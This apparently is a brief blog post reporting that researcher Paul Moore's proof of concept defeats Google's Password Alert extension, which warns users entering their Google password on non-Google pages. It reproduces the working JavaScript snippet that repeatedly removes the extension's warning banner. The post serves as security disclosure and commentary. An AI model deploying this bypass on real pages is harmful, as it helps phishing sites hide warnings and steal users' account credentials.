Google Password Alert Already Subverted

Posted on by

This week Google released a browser extension designed to warn users when they enter their Google password on any page that is not controlled by Google, and this piece of security theater has already been subverted. Researcher Paul Moore has already created of Proof of Concept (Not a Google Login Page) which subverts the browser extension using a few lines of Javascript. The snippet of Javascript in question is below:

<!-- BYPASS GOOGLE'S PASSWORD ALERT "PROTECTION" -->
<script type="text/javascript">
  setInterval(function() {
    if(document.getElementById("warning_banner")) {
      document.getElementById("warning_banner").remove();
    }
}, 5);

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>